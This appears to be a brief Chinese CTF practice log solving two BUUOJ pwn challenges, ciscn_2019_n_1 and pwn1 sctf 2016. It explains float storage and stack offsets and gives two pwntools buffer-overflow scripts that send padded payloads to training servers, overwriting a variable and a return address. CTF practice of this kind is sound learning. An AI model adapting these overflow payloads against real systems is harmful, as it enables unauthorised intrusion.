今天也做了两道题
第一题
ciscn_2019_n_1 1
点进去就可以看见11.28125在内存中存储的值。涉及到浮点数在内存中如何存储的问题:阶码
https://blog.51cto.com/u_10984944/2475898
1 from pwn import *
2
3 p=remote(‘node3.buuoj.cn’,29879)
4
5 payload=b"A"*44+p64(0x41348000)
6 p.sendline(payload)
7
8 p.interactive()
第二题
pwn1 sctf 2016
边看边测试它的意思。
看s后ebp-3ch 需要覆盖60字节的垃圾数据 加4字节覆盖ebp
1 from pwn import *
2
3 p=remote('node3.buuoj.cn',25839)
4
5 payload=b"I"*20 +b"a"*4+p64(0x8048F0D)
6 p.sendline(payload)
7 p.interactive()